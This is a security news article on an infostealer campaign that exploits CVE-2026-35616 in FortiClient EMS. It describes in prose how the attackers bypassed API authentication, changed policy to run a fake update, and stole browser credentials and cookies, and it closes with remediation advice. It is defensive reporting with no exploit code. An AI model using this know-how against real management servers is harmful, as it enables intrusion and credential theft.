New infostealer reaches enterprise devices through FortiClient EMS vulnerability

Attackers are delivering a broad-spectrum infostealer to enterprise computers by exploiting a known vulnerability (CVE-2026-35616) in FortiClient Enterprise Management Server (EMS).

“The [malicious] payload was presented as a Fortinet endpoint update and executed through FortiClient-managed VPN scripting workflows,” Arctic Wold researchers noted.

About CVE-2026-35616

CVE-2026-35616 is an improper access control vulnerability vulnerability in FortiClient EMS, a centralized management platform through which IT admins deploy, configure, and monitor FortiClient endpoint security software across all devices in an organization’s network.

The vulnerability was publicly disclosed in early April by Fortinet, after Defused Cyber spotted it being exploited as a zero-day. Details about the attacks were unavailable at the time.

The attacks observed by Arctic Wolf happened in May 2026.

The attack campaign

CVE-2026-35616 allows attackers to bypass API authentication and authorization.

“When specially crafted HTTP requests are sent to certain FortiClient EMS endpoints without valid credentials, the requests are processed as if they were legitimate administrative actions. From that point onward, threat actors can interact with EMS functionality that would normally require administrative access,” Arctic Wolf researchers explained.

“Several follow-on actions were performed by the threat actor, such as updating the remind_upgrade_after configuration to defer firmware upgrade reminders, as well as editing the Remote Access Profile configuration and endpoint policy to insert a malicious script for execution on endpoint devices.

The malicious payload (FortiEndpoint_Patch.exe) delivered to target endpoints is a MinGW-compiled Windows credential stealer the researchers dubbed EKZ Infostealer.

The malware is capable of harvesting session cookies, credentials and autofill data stored by browsers and software using the Chromium and Gecko engines: Google Chrome, Microsoft Edge, Opera, Brave, Vivaldi, Mozilla’s Firefox (and its Thunderbird email client), the Tor Browser, LibreWolf, Pale Moon, and others.

“While not directly observed in this infection chain, several other malicious samples were recovered from the threat-actor-controlled HTTP server,” the researchers noted. Those samples had file names like FortiEndpoint_Patch.2.4.9.zip, Microsoftr Windowsr Operating System-Installer.exe, and fil_api_ms_win_crt_apibase_l1_1_0.dll.

Investigation and remediation

Arctic Wolf shared known indicators of compromised tied to this attack campaign and has urged organizations using FortiClient EMS to check its log for specific headers showing certificate errors, new accounts, suspicious/unfamiliar logins, and execution-enabling configuration changes.

The researchers also warned that the stolen cookies and credentials may be used by attackers for “follow-on access to cloud services, internal applications, and other authenticated resources”.

If evidence of compromise is found, a thorough remediation process must include changing affected passwords and revoking active sessions across all potentially affected services. Depending on the autofill data saved by the browsers, further action may be needed (e.g., cancelling and reissuing payment cards whose details were stored).

Subscribe to our breaking news e-mail alert to never miss out on the latest breaches, vulnerabilities and cybersecurity threats. Subscribe here!